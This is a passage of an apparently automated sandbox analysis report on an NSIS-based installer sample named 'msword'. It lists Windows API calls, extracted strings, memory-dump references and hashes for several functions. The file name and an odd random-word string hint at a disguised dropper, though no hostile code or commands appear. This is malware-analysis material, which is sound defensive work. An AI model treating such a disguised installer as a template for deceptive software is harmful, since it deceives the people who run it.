EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NSIS Error, xrefs: 004038E2
~nsu.tmp, xrefs: 00403AF7
1C, xrefs: 00403B56
\Temp, xrefs: 00403A1B
_?=, xrefs: 00403A64
SeShutdownPrivilege, xrefs: 00403C16
/D=, xrefs: 004039A6
Error launching installer, xrefs: 00403A7D
NCRC, xrefs: 0040397C

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
detailprint: %s, xrefs: 00401679
CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
BringToFront, xrefs: 004016BD
SetFileAttributes failed., xrefs: 004017A1
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Jump: %d, xrefs: 00401602
Sleep(%d), xrefs: 0040169D
Call: %d, xrefs: 0040165A
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEd32, xrefs: 00405BA8
@%F, xrefs: 004059F6
RichEdit, xrefs: 00405BC4
@rD, xrefs: 00405965
RichEd20, xrefs: 00405B9D
B%F, xrefs: 00405A1F
.DEFAULT\Control Panel\International, xrefs: 00405999
RichEdit20A, xrefs: 00405BB6, 00405BBB
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error creating "%s", xrefs: 00401AF0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user abort, xrefs: 00401B53
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
API String ID: 4286501637-1929300520
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Null, xrefs: 0040367E
Inst, xrefs: 0040366C
soft, xrefs: 00403675
Error launching installer, xrefs: 004035D7

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
